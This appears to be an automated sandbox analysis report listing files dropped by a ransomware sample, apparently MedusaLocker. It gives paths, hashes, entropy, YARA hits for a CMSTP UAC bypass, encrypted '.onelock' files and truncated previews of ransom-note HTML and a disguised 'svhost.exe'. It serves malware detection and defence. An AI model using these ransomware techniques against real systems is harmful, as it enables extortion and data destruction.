                                    Preview:>|.6......=.......V....W..\{..].\....e\:9sr.X..uH......a...,.....`'umh..@iRS]./..7....r..m..`.(J.-.4.=r... ...t.=.`|'.P.-...w...|{...:...t,...w.!..5..y..H.]PN.'...cfi...!.a..1....W.X....V......7...b.S............. .....N;"....TT...i....L"...e..t...u..d...&MHyX.....av./..k.]......../...\...!\.Nj..BwA....~.,.|....E....~%.G7).q...#..+.L.u7.Q.[..o.....P...PQ....b..<}c.%.....2e..t.j.> ..t.....x1..B.>2..V..s..L....m..........d...E.@2q.{.v-*.i....r.P....vc*.0....iV....:Qx(.,.......n.....Eh.Q.^M.*...'..0...........l.aKf.Ha..K..)...>.....$s.r..F_(.o..d.d!{..b(.....q..4...l...,.Vx..Un......Jh...}/.}.C.Hh}4..nh.l.J.'..........z..a...&8.Fo..+X/...Xi...u ....K....-.......}d?T7W~.\.",...m.....VA...K.5'Qz#%..=b....C.z..Zu...W.GS$.7.;w.T.Z..Ew....2...!w..,f...:.|h.#V.kb.j=.ty...Px.)..}...K:].}Z;..o:$QJ......8 .v{.^?!.q.k.lc.X...))...Yk. lU .%!....{....{..>qL..8..#....n'..p...^..%G..%.#@u(Y.....m..w..k^...#c0Q.qDT....|@...d....I(@.{...1.|........-7C.

                                    C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):244417048
                                    Entropy (8bit):6.919251884180285
                                    Encrypted:false
                                    SSDEEP:6291456:4hpELQzJo3S/buKi8FpgpeNcOf77ntTVU5EAb2XO9oo:+pELQzWKi8FpgpeNcOf77ntTVU5EAb20
                                    MD5:691663F587683CDDDE61CDF8B5EC6404
                                    SHA1:C520C74D6B599D1A9FD656D87C1657F4F6079ABB
                                    SHA-256:4751B85861F5F619F7D7080483CD261776ED7011B69F8C1E65015F419DF707C6
                                    SHA-512:AE6D4C0CB687052CA666BA0B123A0B156C8AC01BCD897E6F9A92841A9D8CFEAA3274F1836E262C4EB6E3E0C3E51463DB899F97173E246175FD562D8F24E44200
                                    Malicious:false
                                    Preview:>|.6......=........?3W..4.|\....`..,9.Y...F.J.bgK.c3.Fd.A.....}..............dj..~.'....W%.....e..F.@.^.&.|5}.p*..&.......VV.....:&.w._p.H..2.*Q..>....>.....Yj....lG... .6.c.l.Nj./.%IK|k4...hyR...).ie.h+......c.p.+,...7M.....p.w....&.$X...KG..>F...?.G..M..m.eQ..!...Pb.....l%.&>._.z.o..t.\.....mn...&.f;+`.>....U.....w...i.i.l....z............xY..{.R.....$..B[LLj.yo(..l..'N9..l....n...a...(.>......0.A..w.y..m....9.V....fi.V....~,w^.-P,w5tK.K......s..vp...F.M.!.......>#....Fd.:.K.Xs.A.xwV-.A..i..?-.vd.;.:O.....r.(C'.v@.7p..s9.'.0.AO.x8..p*.....%.!~$..W..%.....A.....>....p...a@].`:..].........*-...~.Vt../~..s...#...v.sd......*FwB......f./...{.9.n.|..kR].'..oW.). ......BQ.d.x....g2DG..9.G7.D.9|..:..:......WCT.....N..$..........mh..e.{.W.b..C...\!.`.$....z=.@........}!..Mt.d....`'.W....Y.._..cvZh.[..@.F..E!.0E........O.e..a.D.u.].8..).Q...^AwK.........|>..l....sv..@V.%xs0....o$...|'...y.B..9).......S.h,x.<..C9s.|.*......... .{...@.?..bO.......By

                                    C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2794008
                                    Entropy (8bit):7.999941320269777
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:AC659E4C7691EDE84A6467A87EFAA20B
                                    SHA1:16A86243CF9C1D89243FE7C492039D433BDC8BE3
                                    SHA-256:96523C790EF43C8016D2EC904A2D739176B64B4D557ECE51C4846AA52E54FB3E
                                    SHA-512:E9B52756F8C82FF715813168D6465D217EDAF47B870081235646A0CB855DBAA4C8F1E95D05002EEA32B32C78FFDC227E53C77F741FA71A1433A7B53511FC5DB9
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]......r.....3Y..]..j.|...@0&.....*1..F.n5wLP.gc...F.'YO.J,.A..t.n..Nbt...Mb.3..i.....}.k....)..`~h).....4`jh...?P7K.0..-........L......"'D...Ux..Z.A.T@.;.6...@|@.Yq9Y.{.C......^....w...j...;^...WV{..t.;.V.~...L4..W....$.isSu....."..\.M.F.+.}...@.i<N......./.C..1......[.!m..{.......N...l."....L..u.LJ.X#.hdb,.Ko.V.n..CVj...`.~...3j:.R..uAXE.....L.`......>0....8..V2#.k.F.rV..M.ax.Y.Z..Dm}..>....o.ia0..G..68..\....-T......1x.....z{H.7..x..x.$.Q1B.u..P..b.K."...M.....CX....iFH....K.$u..}I...?.OZ.N..rM..n5.E...R.!.a=:..p.....ub...0"r@..!2....]......@..xBv..ue.Lj_*}.*:....n(..F..q..-. .;..........M&.OJ..H........%..`.,..g....&....O....9.....c.. ..H.......L.@.).1%.K...zV./t.|..7.E.L.[.B)Giz.....U...-.:...|].}.9...EB.....V'..2....I.w..s9..$;.X.h......$.A.zi...A.....&(h..-D...m..8KN.o;.c..2'...{L....s;Lg`....i..._t..Px-X]......_j..&.b..m.&.iQ.O" 7.L..Q..\.....y..7...B.`./.N..|e....t.XV.%.v..XX.....cs%a*;..R.... ....n..o

                                    C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):175114579
                                    Entropy (8bit):6.997748181847772
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:811E47ECC528DF476FAFAEA27C7AFCAE
                                    SHA1:4B4E001D2F6E22F82CE1E8543DCAFB6B3B7499DB
                                    SHA-256:04A0C34707FC04A15F8AC4FF8AB6121BADD6B8F51F20A3FAB504D48BF3B9A3AD
                                    SHA-512:AA8D82F2B478843EBAB4B7EC46DE1D093E6B8FF4929E51D9B3F927CDE00CFCF6BC4A4E09F2F5A35D39A093A19288AA03D8B2D71B3275DCA952A7677D0E2E0D65
                                    Malicious:false
                                    Preview:"..S2.l,@.....(.*..o...sA.....r...\.{....h.{.,.h.6.6....B.r..S.d...V.j.&....;..*....I..Ry.&........C..7% .g.|.....;....tQ.^..k`.E.`-....3U.usj..5..l..../...Z^l!.2@u8~..A(o.$-.Of......S.W9,....7x.].....S..*.2...=..x..f.....HDJ...e....!.BM9.+.e.tUK.<.[.........L.U4..........~.Z../).bY..f.j..[..........4+,...x7..Y.ZF..u..+........Y.`:-..}...^..u..W~q~9<Ek.s..n...e`..4.+.xK..........:>..G>..z.u.o.4L.....Y!.%../..Pn.$.n..$}&kA...>...Q....Z>.XN.]jn.&>..,..)....r....r.0_...=..1$..FA..AEL...T.....@..-O.5.*.z..O&..,:f[.....L9q.....<.;...#....Th.|..q.i.~;...._|,H..B.E..........Mg.9...@n..~+..3.....3.".^v.t.l....d?..k).I+.i.!.>...g...M..+i.-W...vwde..K....Cu-Y.hq....5kb.....S...`.._...E.|<7....=Ti.....k...;K.Q........_.2.....;.'......J......8_>.y^.R-..y#.(........C....W...P......}.M..n.!....4.6Na.b#.eF,.Q2..p...v....Y.....V.X..0......v..Iz...K.E:}..T,.X}.9..!}.....`.c....U.QB.z.y.......~...5.....Yi..........q......@..6G...<.J..s5/bC..*ne.

                                    C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\Recovery\WindowsRE\ReAgent.xml

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.975821602327213
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:DEE9144F23E2ADC461C4F884D76F3D9E
                                    SHA1:2CEF7363EB4936FEBC8722AD655477EC56455E53
                                    SHA-256:5F195EC629E3D957FD28DBC8FC2DDBBB55550505F5B78C2893966946EC1B1EE3
                                    SHA-512:30E7766A7C811A890FCA56CB9D526730E122CFDACA251607974CA938505EE6E4567D8FF40FC24058D6B0DB96A54392E976A06F4D6C8632060D69CF53BD2C527C
                                    Malicious:false
                                    Preview:.pi..2S.s^R.P\..mR....Y...=F\.d.7../...g...C*|\.iY9a$....~^. ...9..j..bI..g....\~I..../w...G.e.c)....a..+f..D.}..-PI...NJ .K<L.t.....U...1.V2u..(1R.......D.....KB..jo..n.U.F....9t..@......8...^.....#.A......;x.E...H......9\$.&.W..,.....E|RF.e+.,y..:f........db..A.x...*...y*.|...3W......=.}.d..J..5..yk. O.p>...E...6.Bp0HL......(...?8....Q..c...g.9]...j&..N.(.rS..O......r..v...E...Q1~....kX.~_....K..g.{....>(.y?rC"..[|..?{.2.B..9n.0.f.--......G...M.......T.IN.k...s.r(9...FH..a....F....2.>.9J6.6..(.Y#l.....IO..g.sZ.`.['..h..7..=...H....V.nc.Z..1.....)!.{.J.....5.N.O.m...ug..C..v. :^<X....%f..$0.91......S..H."Vm....]ae...].)....-f......L...%..j....e....FQ(( ..L..........=..d7>[.M.NY.....7.!..6.vHM.,..^.3.u...P..lm......X1.ks........)....PM..7......U...........k.......gPE-Sg........Y.............3......fu.^.(......._.1.-.T..@.6..3.p'.6./....J+.kz.V.......i-.....G....V....`.n. G..+.kU..$C...."..$..%[.K~...j|.Sm.....~..q..-...EwR?'.|..

                                    C:\Recovery\WindowsRE\Winre.wim

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:DOS executable (COM)
                                    Category:dropped
                                    Size (bytes):367239878
                                    Entropy (8bit):7.999581729841427
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:EA4FC44AA0DD9A4413B59910823A6EF3
                                    SHA1:61A52D24BC41BAF79D32D14F2B7F3208FA7BF90A
                                    SHA-256:129A789830A786AFD7AD369CA768E090691F3FFC5F27E99EDDB13760769ED4DB
                                    SHA-512:ADE0A08B84129DF38AD8F8D016DA2433347988DCED5C7214CC5BAF5DF6128EC1373670EB69716DF993B5C8081F42B881618D8D50479A0C8ABBA2A3F49E06746D
                                    Malicious:true
                                    Preview:...xw..B.._. ...o.1........}...8.q...!.}~,....:x&u....&....<Dp.V..Gd..I.X..1'q.<z.........ZY.v.$.y.r.._..p...L.1.O..8.......W...{I)..4J......ve..dCC|3J..:s.q.'.`.f..<..<N4.Iz!...{..g.P.,.N.......~.......`./S%..G..y.z.....g.|}.*......$$..q...~."....l........t..2'.75)..[....p.hE.....;s...??......q.a.....:......C.)4...OTOt..Ox5.S.x....v]3^...).]....X..+..&...0o...)..o..C.L..)....n{.....*..3{......[.>.../4.F.3.....xm[.........-.K.vu..x.j.S."=6...SC[sP..].x,i..J..O....... /.HB.........Z ..G.T.{b#8.W....$.....@K..3-Wg~.]..\b.Dr-8.yg....#I.......|M.e.4mNF.E.p....+.:...kX....w..P..l/.8../4........#...x.H4VrW.i.....j.a]...+....!.6.=.).$.:.2E.1.Z...h..b.g}PO........Z0.t.\.7(1....X..M.+............].sBz.m.@.V..`..&......@.b.4o.V:.<.......r.gz..N..s...`..M..*Z..Q. .3=.w.Q.Kj..x.A.."[.'..d...:.#.<.`A.1..\D.O.l.....7'..v.Jkk..||...d...}D..P3<l@J.o...H....VmY......z>.%...!..w..4...~(;.Gg'J.Y..g.....tW...B.._^......H.F...W..+$..}{.S.< M.0

                                    C:\Recovery\WindowsRE\boot.sdi

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3170840
                                    Entropy (8bit):7.999931844895833
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:31230714AD686244A1E1692A96599057
                                    SHA1:8578AEA64F22DAC0B9801F71B1C19EE138D6CB6F
                                    SHA-256:8D01CFF40ABE924D6022A371040C0970297A6A2B50B6138EDA2900A2FC7D068B
                                    SHA-512:EED2B1AEA32A4FAF480526BDC7559951CC44408B521C71020E02EBD02D534A359F985F3D2203EDCCD4035B5CD046B530B9058EBED1B5D84ADBA2D3D2CE7F38B6
                                    Malicious:true
                                    Preview:.m.....x.IO..Oi?.-.$./.Y6.X....O.c|U...)...K.#M..........:$xP.sP ..UR..5?0.i3.s.HcZ5G.'.....>.0+....x.lptsa....\..\.V1].ZT.".h.A..o..F.#...Db...*r..f&..D.........m..C..#..>.w..6..y..F+..a....g.O8.9._..(....z.[..`.&....v3...26.>...u..{D..\y2..'Z...C.].....^h.....R.i..9,p.?..q...g..:.)-"9D.U..4.w..GA...S.c.R....MK.[....Y.8.....g...3.I.o.b...|8........j.|...B2...z....n. .w,Z..L//.}.:..d`.....-...v"...D;N.f.t+.y.pz....t.`...#*{.9k.v.."K.....i....S'SA}..}..#..5..yT...@...rS.'.|..P..l%....SJ.I}..@&......mK....../.).L....1.\.}...I....4..oA0M.`m..+h...GC..\.~.Z..l}.....<.{..H...-. (...eN(.X.%.I....:...U..J...*...x........f9..)E....^.....M...r../....rv......$:ho...p<..P.......;.y4..u...>.u...w%.a.....}Amo.[[.?....f.V.z.}.T\.....|.....>'...~..cT.{3|...U..)`..so%...t8..~*N.h.C....K.h.|..Q.8.H.}...A*.A.........m.}.,)....:..).....L.X....v4.l.....c.K<..]......'*...7_...k.....hP.l'........:.{S.V.?..3....U.H....S..,.t@..v.~....8.9Dy.....m..fgF.J......|...

                                    C:\Recovery\WindowsRE\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):46
                                    Entropy (8bit):1.0424600748477153
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:89CA7E02D8B79ED50986F098D5686EC9
                                    SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                                    SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                                    SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                                    Malicious:false
                                    Preview:........................................user.

                                    C:\Users\user\AppData\Roaming\svhost.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):685568
                                    Entropy (8bit):6.189424744316123
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:646698572AFBBF24F50EC5681FEB2DB7
                                    SHA1:70530BC23BAD38E6AEE66CBB2C2F58A96A18FB79
                                    SHA-256:26AF2222204FCA27C0FDABF9EEFBFDB638A8A9322B297119F85CCE3C708090F0
                                    SHA-512:89BAD552A3C0D8B28550957872561D03BF239D2708D616F21CBF22E58AE749542B07EEE00FEDAC6FDB83C5969F50EA0F56FC103264A164671A94E156F73F160A
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekSHen
                                    • Rule: MALWARE_Win_MedusaLocker, Description: Detects MedusaLocker ransomware, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekshen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 90%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..CP.CP.CP..8.RP..8..P..8.TP..8.BP..;.[P..;..P..;.gP..8..TP.CP...P.u<.NP.u<..BP.u<.BP.RichCP.........................PE..L...hz.].................,...X......'........@....@.......................................@.................................x........@.......................P..|Z...S..8...................|T.......S..@............@.. ............................text....+.......,.................. ..`.rdata.......@.......0..............@..@.data...hK.......:..................@....rsrc........@......................@..@.reloc..|Z...P...\..................@..B........................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\svhost.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\bootTel.dat

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.980472078831073
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A5CAF994071319D5193D235FD0A7EC82
                                    SHA1:4AF48395BA61E035681B5686875DA8B200484BFF
                                    SHA-256:0AE71D04CA886C34F67FD6792D3A783167D394B58F763678EC1266B2DA6F4A08
                                    SHA-512:DDD4639BEAC51D6D0DE437DEE9A087A92C8A38AF5F6D42653A478248B0A3FC3C0D7E65C976E74A64BF528E0C26362FB0D06F631F2848C4E2D45D9D3DF158F750
                                    Malicious:false
                                    Preview:...r....V.......:.t.,....3.+...."!]....5.6.'b...,j....../.....)2x..$.....C#.zf..a..<.....9...@.&.;~........Zq..L5..:UF...<oh.+O.$..%..J....n.Y......(./...:.Fw.,.G[..R..F.M.(5.I.$D..xA..lh....+C.W..-@....6.9.....S. q..[j...T....\.....-^6...`.4W.]97.1.V.....|@.(k.&.mi.E.@,.M.......$...4./..(.*.....dJ.b.>.....4.Nn@YRZ....d.f....=.)9.........z.....0.z......&.2....yNh._.O1......8h..`.o..N...S,....w.DGkr.1.4../..k..r2'...A..z.@.......9.!......d...h{~..Ag.p*}..0..#.....h.@?............7.JV...}6..n7....<.x.i........h.....>Y.Cx H..G../4?..V...[..U......u.x.w..e.6.....pV.%4U\~E.$.!.F... .zE...(.n.?.je+.:.........uq{....{|...$....y.1+.....p...ml^..w.}N..~.a.N.&L.d@..~<<2R.....[.C>Kp.....b+..fu-.?.............D...w&vr.3./../.\.6......[......*Iy.@0c'[....L.`5.<3..S......2!#......S.Yn.h.;\...dF.....:.J!.y.n.... .,..I...>%.y.[.ynp.l........L....utB[.f.K....9....z{..:.~...;.r.g...uO%T....{R.'.....2>R.O..%...vk}....m.(..,`<.1.v)..g+..~I..j.*..\.2

                                    C:\bootTel.dat.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.980472078831073
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A5CAF994071319D5193D235FD0A7EC82
                                    SHA1:4AF48395BA61E035681B5686875DA8B200484BFF
                                    SHA-256:0AE71D04CA886C34F67FD6792D3A783167D394B58F763678EC1266B2DA6F4A08
                                    SHA-512:DDD4639BEAC51D6D0DE437DEE9A087A92C8A38AF5F6D42653A478248B0A3FC3C0D7E65C976E74A64BF528E0C26362FB0D06F631F2848C4E2D45D9D3DF158F750
                                    Malicious:false
                                    Preview:...r....V.......:.t.,....3.+...."!]....5.6.'b...,j....../.....)2x..$.....C#.zf..a..<.....9...@.&.;~........Zq..L5..:UF...<oh.+O.$..%..J....n.Y......(./...:.Fw.,.G[..R..F.M.(5.I.$D..xA..lh....+C.W..-@....6.9.....S. q..[j...T....\.....-^6...`.4W.]97.1.V.....|@.(k.&.mi.E.@,.M.......$...4./..(.*.....dJ.b.>.....4.Nn@YRZ....d.f....=.)9.........z.....0.z......&.2....yNh._.O1......8h..`.o..N...S,....w.DGkr.1.4../..k..r2'...A..z.@.......9.!......d...h{~..Ag.p*}..0..#.....h.@?............7.JV...}6..n7....<.x.i........h.....>Y.Cx H..G../4?..V...[..U......u.x.w..e.6.....pV.%4U\~E.$.!.F... .zE...(.n.?.je+.:.........uq{....{|...$....y.1+.....p...ml^..w.}N..~.a.N.&L.d@..~<<2R.....[.C>Kp.....b+..fu-.?.............D...w&vr.3./../.\.6......[......*Iy.@0c'[....L.`5.<3..S......2!#......S.Yn.h.;\...dF.....:.J!.y.n.... .,..I...>%.y.[.ynp.l........L....utB[.f.K....9....z{..:.~...;.r.g...uO%T....{R.'.....2>R.O..%...vk}....m.(..,`<.1.v)..g+..~I..j.*..\.2

                                    C:\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    Y:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997304266790072
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:23BCDF6B4CDD5B88C4901AB8DE79062E
                                    SHA1:E2241BBDAE4DD15CA1170DD9AD5876A84B56FF93
                                    SHA-256:9B82C0FE441CA4BA4C36F5500E02D1E82F27426E31EE01F9A204C8A2FC7424AB
                                    SHA-512:18C02DEA53372678ACFA64141833F14F3B60B76E98A066C75D45953F873F38B1465D1BF12242E5D15C5860D3040DBFE0E3CE2CB7D8FDA5542ED6A1C92660E33B
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s.?z.t.s.=..].....}....(.}...gE\.n...?{8.t.0. F.^....V9nn.....(..Y?.a.......;*..zs.;...i9.WD..AB7...../@+.q%4;K.|..}T.V.)C........=...k.`}%K.....).2U+..`IzZ#.....QlR...n5.....7.)...L.m.FZ..L..5N".d...a.!P....D...\5.EK+.E..yqu>......T...Nr.\...Pg....K.P...z...g. ....=....{].JV.%.......=n-....-rn...hl....../x..8..GV..fH..L..W.....+.O.?.8...]T.y..h,.hl.m@@..........$..L`Vw.k.c..... 2.y.S1...2..l1a....]M..W......3.'%L_...%&xP.ee.b...=..,...y3.....[..J.].2.*.#.NdVF.......G4.)......X..rv....-.;...u......'..W2..|...#. .`B..'$.H.K..e.=..1."Q.t.<x...l..F.T".x..XC...9........x(........tY..:..kB...w.u.....$....h...Ut.."r.DI.b..d{.........~D.;.@."...q.E!.....?....!^."a...H{..^VM....{...h...uT.

